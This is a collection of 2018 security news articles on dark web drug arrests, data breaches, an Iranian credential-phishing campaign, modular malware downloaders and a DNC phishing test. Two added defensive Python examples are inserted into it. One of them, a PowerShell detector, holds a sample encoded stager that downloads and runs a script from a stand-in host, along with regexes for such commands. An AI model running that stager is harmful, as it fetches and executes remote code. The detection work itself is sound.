STE WILLIAMS

Top dark web drug vendors nabbed by ‘Operation Darkness Falls’

The US government stepped up its attack on dark web criminals this week, announcing the arrests of several alleged drug traffickers who used hidden online services.

The Department of Justice announced the arrests, along with some charges and guilty pleas, as part of Operation Darkness Falls, a joint initiative involving several government agencies.

Together, they collared a couple that they called “the most prolific dark net fentanyl vendor in the United States and the fourth most prolific in the world”. San Antonio-based Matthew and Holly Roberts traded under the name MH4Life, among others. Way to obscure your identities, guys.

The couple traded on several dark web sites, including Dream Market, Silk Road, Darknet Heroes League and Nucleus. They also used AlphaBay, one of the largest dark web marketplaces, before it shut down last year.

They used Tor to communicate, and bought postage in cryptocurrency to hide their tracks, the DoJ said.

This was the big ticket arrest for the operation, but it included several others. When law enforcement arrested an alleged Xanax dealer, Nick Powell, earlier this year, they seized $438,000 in Bitcoin.

Some arrests have already led to guilty pleas. Ryan Kluth, who admitted to distributing fentanyl and child abuse images via dark web sites, is likely to get ten years in jail as part of his plea.

The authorities also worked with the Royal Canadian Mounted Police to nab Canadian Robert Kiessling, labeled the third largest fentanyl reseller in North America.

Dark web sites cannot be reached via regular browsers using the HTTP protocol. Instead, they are located on private servers accessible only via encrypted, anonymising protocols such as Tor and I2P. This makes it difficult to know who is operating them or visiting them.

Like any enabling technology, dark web protocols can be used for good and bad. Dark web sites help dissidents and whistleblowers share information, for example, and many legitimate sites have created Tor instances, including Facebook.

However, anonymity is also a draw for criminals, and dark web marketplaces are havens for illegal sellers. They post advertisements for generally illegal items ranging from narcotics to weapons, and customers order them using cryptocurrency. The goods usually ship via the regular mail.

While the dark web makes it more difficult for authorities to track down wrongdoers, it doesn’t make it impossible. Ross Ulbricht, aka Dread Pirate Roberts, who founded the original Silk Road dark web marketplace, was laid low by poor operational security.

More recently, the DoJ revealed that law enforcers had posed as bitcoin exchanges to lure criminals on the dark web with fake money laundering offers. Powell’s arrest was among those announced at the time.

The authorities have gone to extreme measures to track down dark web criminals. When the FBI gained access to Freedom Hosting, a company that hosted illegal Tor hidden service sites, agents modified all of the pages it served to include hidden code.

In this latest initiative, the DoJ worked with the U.S. Immigration and Customs Enforcement’s Homeland Security Investigations (HSI), the U.S. Postal Inspection Service (USPIS), Federal Bureau of Investigation (FBI), and the Drug Enforcement Administration (DEA).

Europol has also established a team to tackle dark web crime, which it launched officially in May.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/7JpI5kiD3tk/

T-Mobile suffers data breach affecting 2.2 million customers

The third most popular mobile network in the US, T-Mobile, has suffered a data breach that affected more than two million of its customers.

According to the company’s website, on 20 August 2018, T-Mobile’s in-house security team noticed unusual activity that was immediately “shut down.”

Data potentially compromised before the shutdown included subscribers’ names, billing zip codes, phone numbers, email addresses, account numbers and account types (e.g. pre-paid or billed).

Apparently, no social security numbers (SSNs), financial data or account passwords were accessed during the attack.

The alert doesn’t mention the number of subscribers involved but this is being reported by Motherboard as just shy of 3%, or around 2.26 million accounts.

Users caught up in the breach would be contacted with further instructions, T-Mobile said, though the company didn’t say how or when that would happen. (Motherboard quoted a spokesperson as saying that affected customers would be told by text message.)

If there’s good news in this incident, it’s that the breach seems to have been noticed quickly by T-Mobile’s in-house security team, and the company has told its customers within a matter of days.

In plenty of other breach incidents, companies have realised what happened only after they were contacted by a third-party researcher, by the attackers themselves, or, in the worst-case scenario, by customers reporting fraud attempts.

This is often weeks or months – sometimes even years – after the event, by which time a lot of damage has been done.

According to the Privacy Rights Clearinghouse, so far in 2018 (to early August) 513 disclosed data breaches covering 819 million records have been recorded. For comparison, the whole of 2017 saw 831 breaches covering just over two billion records.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/NvPxbpYV-fc/

Uni credential-swiping hack campaign linked to Iranian government

US infosec firm Secureworks has uncovered a login credential-hoovering operation linked to Iran that targeted universities across a number of Western nations.

Secureworks’ Counter Threat Unit (CTU) found a mass credential-stealing campaign targeting over 70 universities in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the UK and US. The company pinned this on a hacker crew it has dubbed Cobalt Dickens, which it alleged is associated with the Iranian government.

Having found a URL pointing to a spoofed login page for a university’s website, Secureworks did some IP address-based research and identified a network of 16 domains with more than 300 spoofed websites. Further research into the IP address hosting the spoofed page revealed a broader campaign to steal login credentials.

After entering their credentials into the fake login page, victims were redirected to the legitimate website where they were automatically logged into a valid session, or were prompted to re-enter their details.
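The discovery path described above, starting from one spoofed login page, pivoting on its hosting IP to sibling domains, and then checking which of those resemble the targeted institution, as an added illustration that is not Secureworks’ own tooling. Every input is constructed: the domain names are hypothetical, the addresses come from the RFC 5737 documentation ranges, and the registrable-domain heuristic is a simplification of proper Public Suffix List handling.

```python
"""Pivot from one confirmed spoofed login page to sibling domains on the same
hosting IP, then score each sibling for institution-lookalike traits.

Added illustration, not Secureworks' tooling. All inputs are constructed:
hypothetical domain names and addresses from the RFC 5737 documentation ranges.
"""
from collections import defaultdict

# Constructed passive-DNS style (domain, hosting IP) observations.
RECORDS = [
    ("example-university.edu", "198.51.100.11"),                   # legitimate site
    ("library.example-university.edu", "198.51.100.10"),           # legitimate library portal
    ("example-university.edu.library-login.xyz", "203.0.113.5"),   # confirmed spoof (the seed)
    ("example-university.edu.library-login.xyz", "203.0.113.6"),   # same spoof, second host
    ("libproxy-exampleuniversity.xyz", "203.0.113.5"),
    ("sso-example-university.info", "203.0.113.6"),
    ("exampie-university.com", "203.0.113.6"),                     # 'l' swapped for 'i'
    ("weather-example.org", "203.0.113.6"),                        # unrelated co-tenant
]
SEED = "example-university.edu.library-login.xyz"

# Domains the institution actually owns (constructed).
LEGIT_DOMAINS = {"example-university.edu"}

# Tokens the report associates with the campaign's targets: library and login portals.
LOGIN_KEYWORDS = ("library", "libproxy", "ezproxy", "login", "sso", "portal")


def registrable(domain):
    """Last two labels as the registrable domain. A real tool should consult
    the Public Suffix List (co.uk etc.); this heuristic keeps the example offline."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def pivot_on_ip(records, seed_domain):
    """Every domain observed on any IP that also hosted the seed, seed excluded."""
    by_ip = defaultdict(set)
    for domain, ip in records:
        by_ip[ip].add(domain.lower())
    seed_ips = {ip for domain, ip in records if domain.lower() == seed_domain.lower()}
    siblings = set().union(*(by_ip[ip] for ip in seed_ips)) if seed_ips else set()
    siblings.discard(seed_domain.lower())
    return siblings


def _edit_distance(a, b):
    """Levenshtein distance; catches single-character homoglyph swaps."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_reasons(domain, legit_domains=LEGIT_DOMAINS):
    """Why a domain resembles an institution it does not belong to; [] if it does not."""
    domain = domain.lower()
    reg = registrable(domain)
    if reg in legit_domains:
        return []                       # genuinely owned by the institution
    reasons = []
    for legit in legit_domains:
        brand = legit.split(".")[0]     # "example-university"
        if legit in domain:
            reasons.append(f"embeds {legit} under foreign registrable domain {reg}")
        elif brand in domain or brand.replace("-", "") in domain:
            reasons.append(f"contains brand token {brand!r}")
        elif _edit_distance(reg.split(".")[0], brand) <= 1:
            reasons.append(f"one edit away from {brand!r}")
    keywords = [k for k in LOGIN_KEYWORDS if k in domain]
    if reasons and keywords:            # keywords only matter once a brand link exists
        reasons.append("login/library keyword: " + ", ".join(keywords))
    return reasons


def triage(records, seed_domain, legit_domains=LEGIT_DOMAINS):
    """Pivot from the seed, keep only siblings with lookalike traits."""
    return {
        sibling: reasons
        for sibling in sorted(pivot_on_ip(records, seed_domain))
        if (reasons := lookalike_reasons(sibling, legit_domains))
    }


if __name__ == "__main__":
    for domain, reasons in triage(RECORDS, SEED).items():
        print(domain, "->", "; ".join(reasons))
```

The pivot deliberately returns the unrelated co-tenant too; it is the lookalike scoring, not shared hosting alone, that separates campaign infrastructure from a neighbour on the same cheap host.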

“Numerous spoofed domains referenced the targeted universities’ online library systems, indicating the threat actors’ intent to gain access to these resources,” Secureworks said.

“Many of the domains were registered between May and August 2018, with the most recent being registered on August 19. Domain registrations indicate the infrastructure to support this campaign was still being created when CTU researchers discovered the activity.”

In March the American Department of Justice charged nine Iranians with carrying out a series of attacks on more than 300 universities and 47 companies. Those individuals were said to have been linked to an Iranian company called the Mabna Institute, which the Americans said at the time was engaged in theft of academic logins and data.

Secureworks said that its Cobalt Dickens group was linked to both the Mabna Institute and the charged Iranians.

Defending one’s institution against such attacks is straightforward: implement two-factor authentication and ensure technological security measures are fully up to date with the latest vendors’ patches. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/24/iranian_hackers_secureworks/

Researcher Cracks San Francisco’s Emergency Siren System

Bastille’s director of vulnerability research, Balint Seeber, discusses the process of creating SirenJack and cracking one of a city’s critical safety systems. Filmed at Dark Reading News Desk at Black Hat USA 2018.

Article source: https://www.darkreading.com/iot/researcher-cracks-san-franciscos-emergency-siren-system/v/d-id/1332604?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Modular Downloaders Could Pose New Threat for Enterprises

Proofpoint says it has recently discovered two downloaders that let attackers modify malware after it has been installed on a system.

Two recent malware discoveries suggest that attackers are turning to new modular downloaders that allow them to modify and update their software at will after it has been installed on a victim’s system.

Security vendor Proofpoint says its researchers have observed a previously undocumented downloader, called AdvisorsBot, being used in a malicious email campaign targeting workers in the restaurant, hotel, and telecommunications industries since at least May 2018.

The malware is designed in such a way that attackers can add new payloads and capabilities to it post-infection. For the moment, at least, all that AdvisorsBot is doing is loading a fingerprinting module on infected systems presumably so it can identify systems of interest.

The data being collected and sent back to the malware’s command-and-control server includes system ID, operating system version, domain-related information, Microsoft Outlook account details, information on any antimalware tools on the system, and some unknown hard-coded values. AdvisorsBot currently can receive and execute only two commands — one to load a module and the other to load shellcode in a thread, Proofpoint says.

The malware is identical in function to another modular downloader named Marap, which researchers at Proofpoint also recently discovered. It is being used in a relatively large email campaign targeting users in the financial sector.

Like AdvisorsBot, Marap is designed to let attackers update their malware at will after it has been installed on a victim’s system, but it, too, currently only has a system fingerprinting module.

Growing use of such malware could pose new problems for enterprises.

“Modular downloaders tend to be small and ‘quiet’ in contrast, for example, to ransomware that lets victims know quite clearly that they are infected,” says Sherrod DeGrippo, director of threat research and detection at Proofpoint. “For the enterprise, having stealthy malware installed on clients and servers capable of carrying out a variety of malicious actions in the future presents significant risks to organizations and real benefits to threat actors.”  

Both AdvisorsBot and Marap employ features aimed at making it harder for security researchers to analyze the malware. For example, AdvisorsBot contains a lot of extra loops, statements, instructions, and other junk code designed to slow down reverse-engineering, according to Proofpoint. It also includes features for detecting anti-malware tools and for when it might be running in a sandbox so it can exit without executing.

The threat actor behind the campaign — an entity that Proofpoint identifies as TA555 — has been distributing AdvisorsBot via phishing emails containing a macro that initially executed a PowerShell command to download the malware. Since early August, the attacker has been using a macro to run a PowerShell command, which then downloads a PowerShell script capable of running AdvisorsBot without writing it to disk first, Proofpoint said.
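A detection sketch for the delivery chain just described (an Office macro launching PowerShell, which then fetches a script and runs it without writing it to disk), as an added example rather than Proofpoint’s detection logic. The events are constructed in a Sysmon-style shape, the hostnames use reserved example names, and the indicator weights and alert threshold are assumptions to be tuned against a real baseline.

```python
"""Score process-creation events for the chain Proofpoint describes: an Office
macro spawns PowerShell, which fetches a script and runs it in memory.

Added example, not Proofpoint's detection logic. Events are constructed in a
Sysmon-like shape; hostnames are reserved example names; indicator weights and
the alert threshold are assumptions to tune against a real baseline.
"""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# (pattern over the lower-cased, decoded command line, weight, label). One weak
# match such as an admin's -NoProfile must not raise an alert on its own.
INDICATORS = [
    (r"downloadstring|downloaddata|downloadfile|invoke-webrequest|\biwr\b", 3, "remote fetch"),
    (r"\biex\b|invoke-expression", 3, "in-memory execution"),
    (r"(?:^|\s)-e(?:nc|ncodedcommand|c)?(?=\s|$)", 1, "encoded command"),
    (r"-w(?:indowstyle)?\s+hidden", 1, "hidden window"),
    (r"-nop(?:rofile)?\b", 1, "no profile"),
    (r"-e(?:xecutionpolicy|p)\s+bypass", 1, "execution policy bypass"),
    (r"frombase64string", 2, "inline base64 decode"),
]
ALERT_THRESHOLD = 4
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]+)")


def split_encoded(cmd):
    """Remove an -Enc/-EncodedCommand blob from the line and return
    (line without blob, decoded UTF-16LE payload or '')."""
    m = ENC_RE.search(cmd)
    if not m:
        return cmd, ""
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        decoded = ""                    # malformed blob: keep the line, skip decode
    return cmd[:m.start(1)] + cmd[m.end(1):], decoded


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons, decoded payload); score 0 unless Office spawned PowerShell."""
    if _basename(event["ParentImage"]) not in OFFICE_APPS or _basename(event["Image"]) not in POWERSHELL:
        return 0, [], ""
    stripped, decoded = split_encoded(event["CommandLine"])
    haystack = (stripped + "\n" + decoded).lower()   # blob removed so regexes see the real script
    score, reasons = 2, ["Office application spawned PowerShell"]
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, haystack):
            score += weight
            reasons.append(label)
    return score, reasons, decoded


def detect(events, threshold=ALERT_THRESHOLD):
    """Alerts for events scoring at or above the threshold."""
    alerts = []
    for event in events:
        score, reasons, decoded = score_event(event)
        if score >= threshold:
            alerts.append({"id": event["Id"], "score": score, "reasons": reasons, "decoded": decoded})
    return alerts


def _encoded(ps):
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://stager.example.invalid/a')"
PS1 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events. Id 1 mirrors the described chain; 2 and 3 are benign look-alikes.
SAMPLE_EVENTS = [
    {"Id": 1, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": PS1, "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + _encoded(STAGER)},
    {"Id": 2, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": PS1, "CommandLine": "powershell.exe -NoProfile -Command $PSVersionTable.PSVersion"},
    {"Id": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": PS1, "CommandLine": "powershell.exe -Command Invoke-WebRequest https://updates.example.invalid/x.msi -OutFile x.msi"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["id"], alert["score"], "; ".join(alert["reasons"]))
        print("   decoded:", alert["decoded"])
```

Decoding the encoded command before matching is the point of the exercise: a rule that only inspects the raw command line sees a base64 blob and misses the fetch-and-execute pattern, while the parent/child pairing keeps an administrator’s interactive download (event 3) out of the alert queue entirely.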

Interestingly, since first releasing the malware in May, its authors have completely rewritten it in PowerShell and .NET. Proofpoint has dubbed the new variant PoshAdvisor and describes it as not identical to AdvisorsBot but containing many of the same functions, including the ability to download additional modules.

“At this time, it is unclear why the author might have rewritten the malware in PowerShell,” DeGrippo says. It is certainly unusual for malware authors to do so and may be an attempt to further evade defenses.

“For the enterprise, more variety in the threat landscape and newly coded malware increase complexity for defenders and should be driving investments in threat intelligence, robust layered defenses, and end user education,” she says.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

Article source: https://www.darkreading.com/vulnerabilities---threats/modular-downloaders-could-pose-new-threat-for-enterprises/d/d-id/1332658?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Half of Small Businesses Believe They’re Not Cybercrime Targets

New SMB version of the NIST Cybersecurity Framework could help these organizations properly assess and respond to their security risks.

Even with increased public awareness of cybersecurity threats, small- to midsized businesses (SMBs) mostly remain behind the curve: some 51% of SMB leaders are convinced their companies are not a target for cybercrime.

Meanwhile, 76% of them say they haven’t activated multifactor authentication (MFA) for their enterprise email accounts, according to a new report released today from Switchfast Technologies. 

“Frankly, we see similar numbers for MDM [mobile device management]” and MFA adoption as well, says Nik Vargas, CTO for Switchfast. He says a single breach can cost a small business up to $130,000, mostly for legal work, cyber remediation, and reputational damage.

Meanwhile, the federal government is giving SMBs an assist: President Trump signed the NIST Small Business Cybersecurity Act last week, which directs NIST to develop a streamlined version of its famed Cybersecurity Framework.

“The fact that the federal government has made this a focus is a positive step,” Vargas says. “Of course, one of the real dangers is that small businesses can be a launching pad for much larger attacks on government sites and the large commercial giants.”

The reality of SMB security challenges has been painfully obvious for some time: a Ponemon Institute report in 2016 found that roughly half of the nation’s 30 million small businesses had been breached. And the new Switchfast report demonstrates that there’s still plenty of work to do to get SMBs up to speed in securing their systems.

Daniel Eliot, director of small business education at the National Cyber Security Alliance, looks for NIST to offer a simplified version of its framework, plus some tools he can use in the NCSA’s small business workshops.

“The idea is to make security approachable to small businesspeople, not to use scare tactics,” Eliot says. “I’m glad Congress recognizes the unique need of small businesses, that they typically lack the bodies or budget to do cybersecurity well.”

NIST’s Cybersecurity Framework provides a way for organizations to assess their security risk, and provides guidelines for protecting, detecting and responding to cyber threats.

Kevin Stine, chief of the applied cybersecurity division in NIST’s Information Technology Lab, says NIST’s work on SMB security will come from existing agency funding.

“I don’t envision grants being made available to small businesses and there won’t be a list of preferred products; that’s not what NIST does,” Stine explains. “NIST has supported small businesses since the early 2000s, so I think we can hit the ground running. Our support may not always be with documents; it may also come in the form of video clips and info graphics that will be useful to small businesses.”

Bill Conner, CEO of SonicWall, says it’s good news to get the feds’ support for SMBs. “The government finally understands the importance of SMBs and plans to put some resources to better understand the risk factor, that SMBs really are not prepared,” Conner says.  

Switchfast’s Vargas says his company’s focus on small businesses started with the first ransomware cases in 2013. In the past, SMB owners could pass off viruses as minor annoyances (think pop-ups) that caused computers to slow down, he says. But once ransomware hit, it became clear that companies could lose money or data – and SMBs were targets, too.

“Small business leaders have to become security champions and communicate it to the staff,” he says. “They have to explain to employees that security is not just about protecting the boss’s Mercedes Benz. They have to understand that their W2s or tax refunds can be stolen, so cybercrime affects them, too.”

Steve Zurier has more than 30 years of journalism and publishing experience, most of the last 24 of which were spent covering networking and security technology. Steve is based in Columbia, Md.

Article source: https://www.darkreading.com/application-security/half-of-small-businesses-believe-theyre-not-cybercrime-targets/d/d-id/1332656?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

A False Sense of Security

Emerging threats over the next two years stem from biometrics, regulations, and insiders.

Over the coming years, the foundations of today’s digital world will shake — violently. Innovative and determined attackers, along with big changes to the way organizations conduct their operations, will combine to threaten even the strongest establishments.

At the Information Security Forum, we recently released “Threat Horizon 2020,” the latest in an annual series of reports that provide businesses a forward-looking view of the increasing threats in today’s always-on, interconnected world. In this report, we highlight the top threats to information security emerging over the next two years, as determined by our research.

Let’s take a look at a few of our predictions and what they mean for your organization.

Biometrics Offer a False Sense of Security
Biometric authentication technologies will flood into every part of an organization, driven by consumer demands for convenience and the promise of added security for corporate information. However, organizations will quickly realize that they are not as protected as they thought as this sense of security turns out to be unfounded. Attackers will learn to find increasingly sophisticated ways to overcome biometric safeguards.

Demands for convenience and usability will drive organizations to move to biometric authentication methods as the default for all forms of computing and communication devices, replacing today’s multifactor approach. However, any misplaced trust in the efficacy of one or more biometric methods will leave sensitive information exposed. Attacks on biometrics will affect finances and damage reputations.

Existing security policies will fall well short of addressing this issue as organizations — from the boardroom down — use new devices that depend on biometric technology. Failure to plan and prepare for this change will leave some organizations unwittingly using a single, vulnerable biometric factor to protect critical or sensitive information.

New Regulations Increase the Risk and Compliance Burden
By 2020, the number and complexity of new international and regional regulations to which organizations must adhere, combined with those already in place, will stretch compliance resources and mechanisms to breaking point. These new compliance demands will also result in an ever swelling “attack surface” that must be protected fully while attackers continually scan, probe, and seek to penetrate it.

For some organizations, the new compliance requirements will increase the amount of sensitive information — including customer details and business plans — that must be stockpiled and protected. Other organizations will see regulatory demands for data transparency resulting in information being made available to third parties that will transmit, process, and store it in multiple locations.

Balancing potentially conflicting demands while coping with the sheer volume of regulatory obligations, some companies may either divert essential staff away from critical risk mitigation activities or raise the impact of compliance failure to new levels. Business leaders will be faced with tough decisions. Those that make a wrong call may leave their organization facing extremely heavy fines and damaged reputations.

Trusted Professionals Divulge Organizational Weak Points
The relentless hunt for profits and never-ending changes in the workforce will create a constant atmosphere of uncertainty and insecurity that reduces loyalty to an organization. This lack of loyalty will be exploited: the temptations and significant rewards from leaking corporate secrets will be amplified by the growing market worth of those secrets, which include organizational weak points such as security vulnerabilities. Even trusted professionals will face temptation.

Most organizations recognize that passwords or keys to their mission-critical information assets are handed out sparingly and only to those that have both a need for them and are considered trustworthy. However, employees who pass initial vetting and background checks may now — or in the future — face any number of circumstances that entice them to break that trust: duress through coercion; being passed over for promotion; extortion or blackmail; offers of large amounts of money; or simply a change in personal circumstances.

While the insider threat has always been important, more than the organizational crown jewels are under threat. The establishment of bug bounty and ethical disclosure programs, together with a demand from cybercriminals and hackers, means the most secret of secrets (essential penetration test results and vulnerability reports, for example) are extremely valuable. Organizations that rely on existing mechanisms to ensure the trustworthiness of employees and contracted parties with access to sensitive information will find existing mechanisms inadequate.

Preparation Must Begin Now
To face mounting global threats, organizations must make methodical and extensive commitments to ensure that practical plans are in place to adapt to major changes in the near future. Employees at all levels of the organization will need to be involved, from board members to managers in nontechnical roles.

The themes listed above could affect businesses operating in cyberspace at breakneck speeds, particularly as the use of the Internet and connected devices spreads. Many organizations will struggle to cope as the pace of change intensifies. These threats should stay on the radar of every organization, both small and large, even if they seem distant. The future arrives suddenly, especially when you aren’t prepared.

Steve Durbin is Managing Director of the Information Security Forum (ISF). His main areas of focus include the emerging security threat landscape, cybersecurity, BYOD, the cloud, and social media across both the corporate and personal environments. Previously, he was Senior …

Article source: https://www.darkreading.com/vulnerabilities---threats/insider-threats/a-false-sense-of-security-/a/d-id/1332636?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

T-Mobile Hit With Customer Information Hack

Approximately 2 million users said to be affected.

On Aug. 20, hackers hit T-Mobile and, according to a statement from the company, gained access to personal information for some of its customers. While no financial data or Social Security numbers were exposed, information including names, billing ZIP codes, phone numbers, email addresses, account numbers, and account types were potentially compromised.

While the company has not released concrete numbers for the hack, it is estimated that approximately 2 million customers were affected.

The company, with approximately 77 million total users, has notified affected customers via text message.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/application-security/t-mobile-hit-with-customer-information-hack/d/d-id/1332661?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Cheddar’s Scratch Kitchen Chain Suffers Data Breach

The cyberattack occurred sometime between Nov. 3, 2017 and Jan. 2, 2018.

Another day, another restaurant chain data breach: this time it was Cheddar’s Scratch Kitchen. The Darden Restaurants-owned food chain said it was alerted this month that its network had been hacked and customer payment card data exposed.

The cyberattack occurred sometime between Nov. 3, 2017 and Jan. 2, 2018. The culprits “were able to access and potentially obtain payment card information used to make purchases in certain Cheddar’s Scratch Kitchen restaurants” in some states, the company said in a breach notification notice on its website. The affected states are Alabama, Arizona, Arkansas, Delaware, Florida, Illinois, Indiana, Iowa, Kansas, Louisiana, Maryland, Michigan, Missouri, Nebraska, New Mexico, North Carolina, Ohio, Oklahoma, Pennsylvania, South Carolina, Texas, Virginia, and Wisconsin.

The exposed network is an older infrastructure that was replaced on April 10 of this year, the company said. “It’s important to note that there are no indications of unauthorized access to the current Cheddar’s Scratch Kitchen network and systems,” the company said.

Article source: https://www.darkreading.com/attacks-breaches/cheddars-scratch-kitchen-chain-suffers-data-breach/d/d-id/1332662?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

DNC ‘spearphishing attack’ was actually a test

The Democratic National Committee (DNC), on Wednesday: We’ve been spearphished! The committee called the FBI about what it said was a fake login page designed to intercept usernames and passwords that would get attackers into the party’s voter database.

The DNC, early on Thursday morning: False alarm! It was a test, but we don’t know who’s behind it.

Here’s the statement from DNC chief security officer Bob Lord:

We have continued to investigate the phishing site reported to the DNC yesterday. We, along with the partners who reported the site, now believe it was built by a third party as part of a simulated phishing test on VoteBuilder. The test, which mimicked several attributes of actual attacks on the Democratic party’s voter file, was not authorized by the DNC, VoteBuilder nor any of our vendors.

The DNC’s voter database contains information on tens of millions of voters. Alarm bells went off when the committee was notified that a fake login page had been created. The DNC initially said that it quickly thwarted the attack by suspending the attacker’s account and that no information was compromised.

But as of Thursday morning, the mystery cleared up. It turns out that what looked like an attempted attack was actually a test from within: specifically, as the Washington Post reported, the Michigan Democratic Party.

The state party officials had invited a group of volunteer white-hat hackers – DigiDems – to conduct penetration testing on the voter database. Unfortunately, they did so without letting the DNC know what they were up to.

As unnerving as the unauthorized (at least, not by the nation-level DNC) test was, the silver lining was that the “spearphishing” attack was spotted and shut down. In other words, the DNC’s cyber security defenses passed the test.

The cybersecurity firm Lookout was the first to have spotted the phishing attempt, the Post reports. Lookout vice president Mike Murray had this to say about the test:

The thing about “false alarms” is that you don’t know that they’re false until you’ve showed up to investigate. All the folks who pulled together on this were amazing, and had this been a real attack, would have stopped something terrible.

Lord replied by thanking everybody who worked “round the clock” with him to respond to the perceived threat.

The positive result of the unauthorized test is a testament to the DNC having likely learned a thing or two after campaign manager John Podesta’s credentials got phished out of him by a malicious email purporting to be a Google security notice in 2016.

Although this incident had a happy ending, it doesn’t mean that true election meddling attacks aren’t coming in thick and fast.

On Monday night, Microsoft’s Digital Crimes Unit (DCU) reported that it took control of six internet domains that were about to be used by the Russian Fancy Bear hacking group – also known as APT28 – to spoof US political organizations.

They included two domains that were passing themselves off as US think tanks – the International Republican Institute and the Hudson Institute – plus three that appeared to be about to target services connected to the US Senate.

Other recent incidents:

Last week, Rolling Stone reported that a candidate running against Rep. Dana Rohrabacher (R-Calif.), known as “Putin’s favorite congressman” for his friendliness toward Russia, was successfully spearphished by clicking on a malicious email link.

In July, Microsoft said it helped block spearphishing attacks from Russia’s military spy agency that were launched against three midterm candidates, including Missouri’s Sen. Claire McCaskill.

Christopher Scott, chief technology officer and remediation lead for IBM’s X-Force IRIS, which conducts incident response and threat intelligence, told the Post that it’s no skin off hackers’ backs if one spearphishing attempt fails. After all, it doesn’t cost anything to keep throwing attempts at a target until the attacker hits pay dirt:

You’re just trying to get one person to click. If I get one person to click and enter credentials, I’ve gotten the capability – and I can throw thousands of messages out to a company.

Scott says that to fend off attacks, you’ve got to get people to keep up their guards:

When we get a message, we want to see what it’s about. We don’t pause and say, ‘Is this suspicious?’ [It’s important for organizations to teach users] to ask the question of your security teams, ‘Hey this looks suspicious, can you check it out for me?’

Here are more tips to help you recognize, and steer clear of, phishing links.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/yb5ZZUbuVYs/